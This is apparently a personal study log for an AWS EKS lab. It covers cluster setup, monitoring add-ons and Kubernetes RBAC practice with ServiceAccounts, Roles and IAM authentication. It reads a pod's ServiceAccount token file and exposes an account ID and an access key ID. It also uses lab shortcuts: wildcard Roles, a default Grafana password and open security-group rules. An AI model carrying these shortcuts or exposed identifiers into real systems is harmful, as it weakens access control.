# Download the YAML file
curl -O https://s3.ap-northeast-2.amazonaws.com/cloudformation.cloudneta.net/K8S/eks-oneclick5.yaml
# Deploy the CloudFormation stack
Example) aws cloudformation deploy --template-file eks-oneclick5.yaml --stack-name myeks --parameter-overrides KeyName=kp-gasida SgIngressSshCidr=$(curl -s ipinfo.io/ip)/32 MyIamUserAccessKeyID=AKIA5... MyIamUserSecretAccessKey='CVNa2...' ClusterBaseName=myeks --region ap-northeast-2
# After the stack finishes deploying, print the working EC2 instance's public IP
aws cloudformation describe-stacks --stack-name myeks --query 'Stacks[*].Outputs[0].OutputValue' --output text
# SSH into the working EC2 instance
ssh -i ./ejl-eks.pem ec2-user@$(aws cloudformation describe-stacks --stack-name myeks --query 'Stacks[*].Outputs[0].OutputValue' --output text --profile ejl-personal)
# DevOps team member 2's PC (second bastion)
ssh -i ./ejl-eks.pem root@<Public IP>
# Switch to the default namespace
kubectl ns default
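kubectl ns here comes from the kubens/krew ns plugin installed on the bastion; if the plugin is not available, the built-in equivalent below does the same thing.
# equivalent without the ns plugin
kubectl config set-context --current --namespace=default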
# Check node info: t3.medium
kubectl get node --label-columns=node.kubernetes.io/instance-type,eks.amazonaws.com/capacityType,topology.kubernetes.io/zone
# ExternalDNS
MyDomain=22joo.shop
echo "export MyDomain=22joo.shop" >> /etc/profile
MyDnzHostedZoneId=$(aws route53 list-hosted-zones-by-name --dns-name "${MyDomain}." --query "HostedZones[0].Id" --output text)
echo $MyDomain, $MyDnzHostedZoneId
curl -s -O https://raw.githubusercontent.com/gasida/PKOS/main/aews/externaldns.yaml
MyDomain=$MyDomain MyDnzHostedZoneId=$MyDnzHostedZoneId envsubst < externaldns.yaml | kubectl apply -f -
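A quick sanity check, assuming the manifest above creates a Deployment named external-dns in kube-system (the name and namespace are assumptions about that manifest):
# check that ExternalDNS is up and look at its recent log lines (names assumed)
kubectl -n kube-system get deploy external-dns
kubectl -n kube-system logs deploy/external-dns | tail -n 5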
# kube-ops-view
helm repo add geek-cookbook https://geek-cookbook.github.io/charts/
helm install kube-ops-view geek-cookbook/kube-ops-view --version 1.2.2 --set env.TZ="Asia/Seoul" --namespace kube-system
kubectl patch svc -n kube-system kube-ops-view -p '{"spec":{"type":"LoadBalancer"}}'
kubectl annotate service kube-ops-view -n kube-system "external-dns.alpha.kubernetes.io/hostname=kubeopsview.$MyDomain"
echo -e "Kube Ops View URL = http://kubeopsview.$MyDomain:8080/#scale=1.5"
# AWS LB Controller
helm repo add eks https://aws.github.io/eks-charts
helm repo update
helm install aws-load-balancer-controller eks/aws-load-balancer-controller -n kube-system --set clusterName=$CLUSTER_NAME \
--set serviceAccount.create=false --set serviceAccount.name=aws-load-balancer-controller
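To confirm the controller came up, the checks below use the chart's default deployment and webhook service names.
# verify the controller deployment and its webhook service (chart default names)
kubectl get deployment -n kube-system aws-load-balancer-controller
kubectl get svc -n kube-system aws-load-balancer-webhook-service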
# Create the gp3 StorageClass
kubectl apply -f https://raw.githubusercontent.com/gasida/PKOS/main/aews/gp3-sc.yaml
# Look up node IPs and store the private IPs in variables
N1=$(kubectl get node --label-columns=topology.kubernetes.io/zone --selector=topology.kubernetes.io/zone=ap-northeast-2a -o jsonpath={.items[0].status.addresses[0].address})
N2=$(kubectl get node --label-columns=topology.kubernetes.io/zone --selector=topology.kubernetes.io/zone=ap-northeast-2b -o jsonpath={.items[0].status.addresses[0].address})
N3=$(kubectl get node --label-columns=topology.kubernetes.io/zone --selector=topology.kubernetes.io/zone=ap-northeast-2c -o jsonpath={.items[0].status.addresses[0].address})
echo "export N1=$N1" >> /etc/profile
echo "export N2=$N2" >> /etc/profile
echo "export N3=$N3" >> /etc/profile
echo $N1, $N2, $N3
# Look up the node security group ID and allow all traffic from the bastion hosts' private IPs
NGSGID=$(aws ec2 describe-security-groups --filters Name=group-name,Values=*ng1* --query "SecurityGroups[*].[GroupId]" --output text)
aws ec2 authorize-security-group-ingress --group-id $NGSGID --protocol '-1' --cidr 192.168.1.100/32
aws ec2 authorize-security-group-ingress --group-id $NGSGID --protocol '-1' --cidr 192.168.1.200/32
# SSH into the worker nodes
for node in $N1 $N2 $N3; do ssh -o StrictHostKeyChecking=no ec2-user@$node hostname; done
for node in $N1 $N2 $N3; do ssh ec2-user@$node hostname; done
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# for node in $N1 $N2 $N3; do ssh ec2-user@$node hostname; done
ip-192-168-1-231.ap-northeast-2.compute.internal
ip-192-168-2-179.ap-northeast-2.compute.internal
ip-192-168-3-12.ap-northeast-2.compute.internal
# Check the ACM certificate ARN in the region in use
CERT_ARN=`aws acm list-certificates --query 'CertificateSummaryList[].CertificateArn[]' --output text`
echo $CERT_ARN
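If more than one certificate exists, the query above returns them all; a simple way to confirm the ARN actually covers the lab domain:
# confirm the certificate's domain matches $MyDomain (e.g. *.22joo.shop)
aws acm describe-certificate --certificate-arn $CERT_ARN --query 'Certificate.DomainName' --output text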
# Add the Helm repo
helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
# Create the values file: unlike the week-4 lab, PV/PVC (AWS EBS) is not used here because cleaning the volumes up afterwards is a hassle
cat <<EOT > monitor-values.yaml
prometheus:
  prometheusSpec:
    podMonitorSelectorNilUsesHelmValues: false
    serviceMonitorSelectorNilUsesHelmValues: false
    retention: 5d
    retentionSize: "10GiB"

  ingress:
    enabled: true
    ingressClassName: alb
    hosts:
      - prometheus.$MyDomain
    paths:
      - /*
    annotations:
      alb.ingress.kubernetes.io/scheme: internet-facing
      alb.ingress.kubernetes.io/target-type: ip
      alb.ingress.kubernetes.io/listen-ports: '[{"HTTPS":443}, {"HTTP":80}]'
      alb.ingress.kubernetes.io/certificate-arn: $CERT_ARN
      alb.ingress.kubernetes.io/success-codes: 200-399
      alb.ingress.kubernetes.io/load-balancer-name: myeks-ingress-alb
      alb.ingress.kubernetes.io/group.name: study
      alb.ingress.kubernetes.io/ssl-redirect: '443'

grafana:
  defaultDashboardsTimezone: Asia/Seoul
  adminPassword: prom-operator
  defaultDashboardsEnabled: false

  ingress:
    enabled: true
    ingressClassName: alb
    hosts:
      - grafana.$MyDomain
    paths:
      - /*
    annotations:
      alb.ingress.kubernetes.io/scheme: internet-facing
      alb.ingress.kubernetes.io/target-type: ip
      alb.ingress.kubernetes.io/listen-ports: '[{"HTTPS":443}, {"HTTP":80}]'
      alb.ingress.kubernetes.io/certificate-arn: $CERT_ARN
      alb.ingress.kubernetes.io/success-codes: 200-399
      alb.ingress.kubernetes.io/load-balancer-name: myeks-ingress-alb
      alb.ingress.kubernetes.io/group.name: study
      alb.ingress.kubernetes.io/ssl-redirect: '443'

alertmanager:
  enabled: false
EOT
cat monitor-values.yaml | yh
# Deploy
kubectl create ns monitoring
helm install kube-prometheus-stack prometheus-community/kube-prometheus-stack --version 57.2.0 \
--set prometheus.prometheusSpec.scrapeInterval='15s' --set prometheus.prometheusSpec.evaluationInterval='15s' \
-f monitor-values.yaml --namespace monitoring
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k get pods -n monitoring
NAME READY STATUS RESTARTS AGE
kube-prometheus-stack-grafana-64854dfdc4-nbfrz 3/3 Running 0 38s
kube-prometheus-stack-kube-state-metrics-5c6549bfd5-q5klr 1/1 Running 0 38s
kube-prometheus-stack-operator-76bf64f57d-rjb5p 1/1 Running 0 38s
kube-prometheus-stack-prometheus-node-exporter-6rfwm 1/1 Running 0 38s
kube-prometheus-stack-prometheus-node-exporter-m74dv 1/1 Running 0 38s
kube-prometheus-stack-prometheus-node-exporter-qhrlm 1/1 Running 0 38s
prometheus-kube-prometheus-stack-prometheus-0 2/2 Running 0 32s
# Deploy Metrics Server
kubectl apply -f https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml
# Open the Prometheus web UI via its Ingress domain
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo -e "Prometheus Web URL = https://prometheus.$MyDomain"
Prometheus Web URL = https://prometheus.22joo.shop
# Open the Grafana web UI: default account - admin / prom-operator
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo -e "Grafana Web URL = https://grafana.$MyDomain"
Grafana Web URL = https://grafana.22joo.shop
Authentication: verifying who the caller is
Authorization: deciding what the caller is allowed to do
(Study aside: how do you pronounce "RBAC"?)
Contents of the .kube/config file (a minimal example is sketched below)
clusters : the list of Kubernetes API server endpoints kubectl can use; a remote API server address can be added here and used.
users : the list of credentials for authenticating to those API servers (a ServiceAccount token, certificate data, etc.).
contexts : combinations of a clusters entry and a users entry; the chosen context determines which cluster/user pair kubectl actually uses.
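A minimal sketch of how those three sections fit together (the cluster name, server URL, and credential values here are placeholders, not values from this lab):
apiVersion: v1
kind: Config
clusters:
- name: my-cluster                     # entry referenced by the context
  cluster:
    server: https://my-apiserver.example.com
    certificate-authority-data: <base64 CA>
users:
- name: my-user                        # credentials (token, client cert, or exec plugin)
  user:
    token: <bearer token>
contexts:
- name: my-user@my-cluster             # pairs a cluster with a user
  context:
    cluster: my-cluster
    user: my-user
current-context: my-user@my-cluster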
Create namespaces and ServiceAccounts, then verify
# Create namespaces (Namespace, NS)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create namespace dev-team
namespace/dev-team created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create ns infra-team
namespace/infra-team created
# Check the namespaces
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get ns
NAME STATUS AGE
default Active 40m
dev-team Active 21s
infra-team Active 17s
kube-node-lease Active 40m
kube-public Active 40m
kube-system Active 40m
monitoring Active 18m
# Create a ServiceAccount in each namespace (serviceaccounts abbreviates to sa)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create sa dev-k8s -n dev-team
serviceaccount/dev-k8s created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create sa infra-k8s -n infra-team
serviceaccount/infra-k8s created
# Check the ServiceAccount details
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get sa -n dev-team
NAME SECRETS AGE
default 0 79s
dev-k8s 0 24s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get sa dev-k8s -n dev-team -o yaml | yh
apiVersion: v1
kind: ServiceAccount
metadata:
  creationTimestamp: "2024-04-12T12:35:57Z"
  name: dev-k8s
  namespace: dev-team
  resourceVersion: "11311"
  uid: 223a186a-05f2-43e8-aa9b-3f5ae38b7208
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]#
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get sa -n infra-team
NAME SECRETS AGE
default 0 77s
infra-k8s 0 23s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get sa infra-k8s -n infra-team -o yaml | yh
apiVersion: v1
kind: ServiceAccount
metadata:
  creationTimestamp: "2024-04-12T12:36:00Z"
  name: infra-k8s
  namespace: infra-team
  resourceVersion: "11322"
  uid: 791eb437-4f51-4d32-9d92-4cdb4362f9c3
Create pods that use the ServiceAccounts, then test their permissions
# Create a kubectl pod in each namespace - container image: bitnami/kubectl
cat <<EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: dev-kubectl
  namespace: dev-team
spec:
  serviceAccountName: dev-k8s
  containers:
  - name: kubectl-pod
    image: bitnami/kubectl:1.28.5
    command: ["tail"]
    args: ["-f", "/dev/null"]
  terminationGracePeriodSeconds: 0
EOF
------------------------------------
cat <<EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: infra-kubectl
  namespace: infra-team
spec:
  serviceAccountName: infra-k8s
  containers:
  - name: kubectl-pod
    image: bitnami/kubectl:1.28.5
    command: ["tail"]
    args: ["-f", "/dev/null"]
  terminationGracePeriodSeconds: 0
EOF
# Verify
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod -A
NAMESPACE NAME READY STATUS RESTARTS AGE
dev-team dev-kubectl 1/1 Running 0 37s
infra-team infra-kubectl 1/1 Running 0 29s
# Check the ServiceAccount (token) mounted into the pod by default
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it dev-kubectl -n dev-team -- ls /run/secrets/kubernetes.io/serviceaccount
ca.crt namespace token
# Inspect the details
kubectl exec -it dev-kubectl -n dev-team -- cat /run/secrets/kubernetes.io/serviceaccount/token
kubectl exec -it dev-kubectl -n dev-team -- cat /run/secrets/kubernetes.io/serviceaccount/namespace
kubectl exec -it dev-kubectl -n dev-team -- cat /run/secrets/kubernetes.io/serviceaccount/ca.crt
# Run kubectl inside each pod: define shortcut aliases
alias k1='kubectl exec -it dev-kubectl -n dev-team -- kubectl'
alias k2='kubectl exec -it infra-kubectl -n infra-team -- kubectl'
# Permission test - listing is denied
## Equivalent to running: kubectl exec -it dev-kubectl -n dev-team -- kubectl get pods
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 get pods
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:dev-team:dev-k8s" cannot list resource "pods" in API group "" in the namespace "dev-team"
command terminated with exit code 1
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 run nginx --image nginx:1.20-alpine
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:dev-team:dev-k8s" cannot create resource "pods" in API group "" in the namespace "dev-team"
command terminated with exit code 1
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 get pods -n kube-system
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:dev-team:dev-k8s" cannot list resource "pods" in API group "" in the namespace "kube-system"
command terminated with exit code 1
# (Optional) Use kubectl auth can-i to check whether the caller has a specific permission
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 auth can-i get pods
no
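kubectl auth can-i can also dump every rule the ServiceAccount currently has, which is handy to compare before and after the Role is bound (same k1 alias as above):
# list everything the dev-k8s ServiceAccount is currently allowed to do
k1 auth can-i --list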
Create a Role in each namespace, then bind it to the ServiceAccount
# Create a Role that grants every permission within its namespace
cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: role-dev-team
  namespace: dev-team
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
EOF
-------------------------
cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: role-infra-team
  namespace: infra-team
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
EOF
# Check the Roles
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get roles -n dev-team
NAME CREATED AT
role-dev-team 2024-04-12T12:45:58Z
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get roles -n infra-team
NAME CREATED AT
role-infra-team 2024-04-12T12:46:05Z
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl describe roles role-dev-team -n dev-team
Name: role-dev-team
Labels: <none>
Annotations: <none>
PolicyRule:
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
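Granting */*/* inside a namespace is convenient for the lab, but a production-leaning Role would normally scope resources and verbs down. A hypothetical narrower variant (not applied in this lab) might look like:
# hypothetical least-privilege alternative: pods and pod logs only, read plus create/delete
cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: role-dev-team-narrow
  namespace: dev-team
rules:
- apiGroups: [""]
  resources: ["pods", "pods/log"]
  verbs: ["get", "list", "watch", "create", "delete"]
EOF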
# Bind each Role to its ServiceAccount with a RoleBinding
cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: roleB-dev-team
  namespace: dev-team
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: role-dev-team
subjects:
- kind: ServiceAccount
  name: dev-k8s
  namespace: dev-team
EOF
----------------------
cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: roleB-infra-team
  namespace: infra-team
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: role-infra-team
subjects:
- kind: ServiceAccount
  name: infra-k8s
  namespace: infra-team
EOF
# Check the RoleBindings
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get rolebindings -n dev-team
NAME ROLE AGE
roleB-dev-team Role/role-dev-team 20s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get rolebindings -n infra-team
NAME ROLE AGE
roleB-infra-team Role/role-infra-team 16s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl describe rolebindings roleB-dev-team -n dev-team
Name: roleB-dev-team
Labels: <none>
Annotations: <none>
Role:
Kind: Role
Name: role-dev-team
Subjects:
Kind Name Namespace
---- ---- ---------
ServiceAccount dev-k8s dev-team
Re-run the permission tests from the pods that use the ServiceAccounts
# Run kubectl inside each pod: define shortcut aliases
alias k1='kubectl exec -it dev-kubectl -n dev-team -- kubectl'
alias k2='kubectl exec -it infra-kubectl -n infra-team -- kubectl'
# Permission test
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 get pods
NAME READY STATUS RESTARTS AGE
dev-kubectl 1/1 Running 0 11m
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 run nginx --image nginx:1.20-alpine
pod/nginx created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 get pods
NAME READY STATUS RESTARTS AGE
dev-kubectl 1/1 Running 0 11m
nginx 1/1 Running 0 16s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 delete pods nginx
pod "nginx" deleted
# Cases where access is still denied
## A different namespace
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 get pods -n kube-system
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:dev-team:dev-k8s" cannot list resource "pods" in API group "" in the namespace "kube-system"
command terminated with exit code 1
## Cluster-scoped resources such as nodes require a ClusterRole (see the sketch below)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 get nodes
Error from server (Forbidden): nodes is forbidden: User "system:serviceaccount:dev-team:dev-k8s" cannot list resource "nodes" in API group "" at the cluster scope
command terminated with exit code 1
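For reference, a hypothetical ClusterRole/ClusterRoleBinding pair that would let dev-k8s list nodes (not applied during the lab) could be sketched like this:
# hypothetical: cluster-scoped read access to nodes for the dev-k8s ServiceAccount
cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: node-viewer
rules:
- apiGroups: [""]
  resources: ["nodes"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: node-viewer-dev-k8s
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: node-viewer
subjects:
- kind: ServiceAccount
  name: dev-k8s
  namespace: dev-team
EOF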
# (Optional) Use kubectl auth can-i to check whether the caller has a specific permission
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k1 auth can-i get pods
yes
# Clean up the practice namespaces
kubectl delete ns dev-team infra-team
How it works: when a user or application uses Kubernetes on EKS, remember that authentication is handled by AWS IAM and authorization by Kubernetes RBAC!
# Install
kubectl krew install access-matrix rbac-tool rbac-view rolesum whoami
# Check the authenticated Kubernetes identity
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl whoami
arn:aws:iam::236747833953:user/leeeuijoo
# Show an RBAC access matrix for server resources
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl access-matrix --namespace default
NAME LIST CREATE UPDATE DELETE
alertmanagerconfigs.monitoring.coreos.com ✔ ✔ ✔ ✔
alertmanagers.monitoring.coreos.com ✔ ✔ ✔ ✔
bindings ✔
configmaps ✔ ✔ ✔ ✔
controllerrevisions.apps ✔ ✔ ✔ ✔
cronjobs.batch ✔ ✔ ✔ ✔
csistoragecapacities.storage.k8s.io ✔ ✔ ✔ ✔
daemonsets.apps ✔ ✔ ✔ ✔
deployments.apps ✔ ✔ ✔ ✔
endpoints ✔ ✔ ✔ ✔
endpointslices.discovery.k8s.io ✔ ✔ ✔ ✔
events ✔ ✔ ✔ ✔
events.events.k8s.io ✔ ✔ ✔ ✔
horizontalpodautoscalers.autoscaling ✔ ✔ ✔ ✔
ingresses.networking.k8s.io ✔ ✔ ✔ ✔
jobs.batch ✔ ✔ ✔ ✔
leases.coordination.k8s.io ✔ ✔ ✔ ✔
limitranges ✔ ✔ ✔ ✔
localsubjectaccessreviews.authorization.k8s.io ✔
networkpolicies.networking.k8s.io ✔ ✔ ✔ ✔
persistentvolumeclaims ✔ ✔ ✔ ✔
poddisruptionbudgets.policy ✔ ✔ ✔ ✔
podmonitors.monitoring.coreos.com ✔ ✔ ✔ ✔
pods ✔ ✔ ✔ ✔
pods.metrics.k8s.io ✔
podtemplates ✔ ✔ ✔ ✔
policyendpoints.networking.k8s.aws ✔ ✔ ✔ ✔
probes.monitoring.coreos.com ✔ ✔ ✔ ✔
prometheusagents.monitoring.coreos.com ✔ ✔ ✔ ✔
prometheuses.monitoring.coreos.com ✔ ✔ ✔ ✔
prometheusrules.monitoring.coreos.com ✔ ✔ ✔ ✔
replicasets.apps ✔ ✔ ✔ ✔
replicationcontrollers ✔ ✔ ✔ ✔
resourcequotas ✔ ✔ ✔ ✔
rolebindings.rbac.authorization.k8s.io ✔ ✔ ✔ ✔
roles.rbac.authorization.k8s.io ✔ ✔ ✔ ✔
scrapeconfigs.monitoring.coreos.com ✔ ✔ ✔ ✔
secrets ✔ ✔ ✔ ✔
securitygrouppolicies.vpcresources.k8s.aws ✔ ✔ ✔ ✔
serviceaccounts ✔ ✔ ✔ ✔
servicemonitors.monitoring.coreos.com ✔ ✔ ✔ ✔
services ✔ ✔ ✔ ✔
statefulsets.apps ✔ ✔ ✔ ✔
targetgroupbindings.elbv2.k8s.aws ✔ ✔ ✔ ✔
thanosrulers.monitoring.coreos.com ✔ ✔ ✔ ✔
# RBAC Lookup by subject (user/group/serviceaccount) name
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rbac-tool lookup
SUBJECT | SUBJECT TYPE | SCOPE | NAMESPACE | ROLE | BINDING
+------------------------------------------+----------------+-------------+-------------+------------------------------------------------------+--------------------------------------------------------------+
attachdetach-controller | ServiceAccount | ClusterRole | | system:controller:attachdetach-controller | system:controller:attachdetach-controller
aws-load-balancer-controller | ServiceAccount | ClusterRole | | aws-load-balancer-controller-role | aws-load-balancer-controller-rolebinding
aws-load-balancer-controller | ServiceAccount | Role | kube-system | aws-load-balancer-controller-leader-election-role | aws-load-balancer-controller-leader-election-rolebinding
aws-node | ServiceAccount | ClusterRole | | aws-node | aws-node
bootstrap-signer | ServiceAccount | Role | kube-public | system:controller:bootstrap-signer | system:controller:bootstrap-signer
bootstrap-signer | ServiceAccount | Role | kube-system | system:controller:bootstrap-signer | system:controller:bootstrap-signer
certificate-controller | ServiceAccount | ClusterRole | | system:controller:certificate-controller | system:controller:certificate-controller
cloud-provider | ServiceAccount | Role | kube-system | system:controller:cloud-provider | system:controller:cloud-provider
...
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rbac-tool lookup system:masters
SUBJECT | SUBJECT TYPE | SCOPE | NAMESPACE | ROLE | BINDING
+----------------+--------------+-------------+-----------+---------------+---------------+
system:masters | Group | ClusterRole | | cluster-admin | cluster-admin
# RBAC List Policy Rules For subject (user/group/serviceaccount) name
$ kubectl rbac-tool policy-rules
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rbac-tool policy-rules -e '^system:authenticated'
TYPE | SUBJECT | VERBS | NAMESPACE | API GROUP | KIND | NAMES | NONRESOURCEURI | ORIGINATED FROM
+-------+----------------------+--------+-----------+-----------------------+--------------------------+-------+------------------------------------------------------------------------------------------+-----------------------------------------+
Group | system:authenticated | create | * | authentication.k8s.io | selfsubjectreviews | | | ClusterRoles>>system:basic-user
Group | system:authenticated | create | * | authorization.k8s.io | selfsubjectaccessreviews | | | ClusterRoles>>system:basic-user
Group | system:authenticated | create | * | authorization.k8s.io | selfsubjectrulesreviews | | | ClusterRoles>>system:basic-user
Group | system:authenticated | get | * | | | | /healthz,/livez,/readyz,/version,/version/ | ClusterRoles>>system:public-info-viewer
Group | system:authenticated | get | * | | | | /api,/api/*,/apis,/apis/*,/healthz,/livez,/openapi,/openapi/*,/readyz,/version,/version/ | ClusterRoles>>system:discovery
# Generate ClusterRole with all available permissions from the target cluster
kubectl rbac-tool show
# Shows the subject for the current context with which one authenticates with the cluster
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rbac-tool whoami
{Username: "arn:aws:iam::236747833953:user/leeeuijoo",
UID: "aws-iam-authenticator:236747833953:AIDATOH2FIJQS6NUPMSPJ",
Groups: ["system:authenticated"],
Extra: {accessKeyId: ["AKIATOH2FIJQYBEPSIM7"],
arn: ["arn:aws:iam::236747833953:user/leeeuijoo"],
canonicalArn: ["arn:aws:iam::236747833953:user/leeeuijoo"],
principalId: ["AIDATOH2FIJQS6NUPMSPJ"],
sessionName: [""]}}
# Summarize RBAC roles for subjects : ServiceAccount(default), User, Group
$ kubectl rolesum -h
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rolesum aws-node -n kube-system
ServiceAccount: kube-system/aws-node
Secrets:
Policies:
• [CRB] */aws-node ⟶ [CR] */aws-node
Resource Name Exclude Verbs G L W C U P D DC
cninodes.vpcresources.k8s.aws [*] [-] [-] ✔ ✔ ✔ ✖ ✖ ✔ ✖ ✖
eniconfigs.crd.k8s.amazonaws.com [*] [-] [-] ✔ ✔ ✔ ✖ ✖ ✖ ✖ ✖
events.[,events.k8s.io] [*] [-] [-] ✖ ✔ ✖ ✔ ✖ ✔ ✖ ✖
namespaces [*] [-] [-] ✔ ✔ ✔ ✖ ✖ ✖ ✖ ✖
nodes [*] [-] [-] ✔ ✔ ✔ ✖ ✖ ✖ ✖ ✖
pods [*] [-] [-] ✔ ✔ ✔ ✖ ✖ ✖ ✖ ✖
policyendpoints.networking.k8s.aws [*] [-] [-] ✔ ✔ ✔ ✖ ✖ ✖ ✖ ✖
policyendpoints.networking.k8s.aws/status [*] [-] [-] ✔ ✖ ✖ ✖ ✖ ✖ ✖ ✖
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rolesum -k Group system:authenticated
Group: system:authenticated
Policies:
• [CRB] */system:basic-user ⟶ [CR] */system:basic-user
Resource Name Exclude Verbs G L W C U P D DC
selfsubjectaccessreviews.authorization.k8s.io [*] [-] [-] ✖ ✖ ✖ ✔ ✖ ✖ ✖ ✖
selfsubjectreviews.authentication.k8s.io [*] [-] [-] ✖ ✖ ✖ ✔ ✖ ✖ ✖ ✖
selfsubjectrulesreviews.authorization.k8s.io [*] [-] [-] ✖ ✖ ✖ ✔ ✖ ✖ ✖ ✖
• [CRB] */system:discovery ⟶ [CR] */system:discovery
• [CRB] */system:public-info-viewer ⟶ [CR] */system:public-info-viewer
# In a separate terminal [A tool to visualize your RBAC permissions]
$ kubectl rbac-view
## Then open http://<bastion public IP>:8800 in a browser; the first load takes a while to fetch data (the page renders after roughly 2-3 minutes)
echo -e "RBAC View Web http://$(curl -s ipinfo.io/ip):8800"
Authentication / authorization deep dive
The key point: authentication is handled by AWS IAM, and authorization by Kubernetes RBAC.
The user runs a kubectl command.
The bearer token (a pre-signed URL) is not consumed by kube-apiserver itself; the webhook token authenticator plugin receives it for a TokenReview and asks AWS IAM to verify it via sts GetCallerIdentity.
Once IAM validates the call, the webhook token authenticator compares the IAM user/role against the aws-auth ConfigMap (for example, a user or group is returned).
Authentication is complete.
RBAC then checks whether the requested action is allowed.
The result of the action is returned to the user.
(See a fellow study member's thorough authentication & authorization summary map.)
STS (Security Token Service): generates temporary security credentials that control access to AWS resources and hands them to trusted users.
With AWS CLI 1.16.156 or later, aws eks get-token can be used without installing aws-iam-authenticator separately.
# Check the ARN of the STS caller identity
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::236747833953:user/leeeuijoo"
# Check the kubeconfig
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# cat ~/.kube/config | yh
...
users:
- name: leeeuijoo@myeks2.ap-northeast-2.eksctl.io
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      args:
      - eks
      - get-token
      - --output
      - json
      - --cluster-name
      - myeks2
      - --region
      - ap-northeast-2
      command: aws
      env:
      - name: AWS_STS_REGIONAL_ENDPOINTS
        value: regional
      interactiveMode: IfAvailable
      provideClusterInfo: false
# Request temporary security credentials (a token): once expirationTimestamp passes, a fresh token is issued
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks get-token --cluster-name $CLUSTER_NAME | jq -r '.status.token'
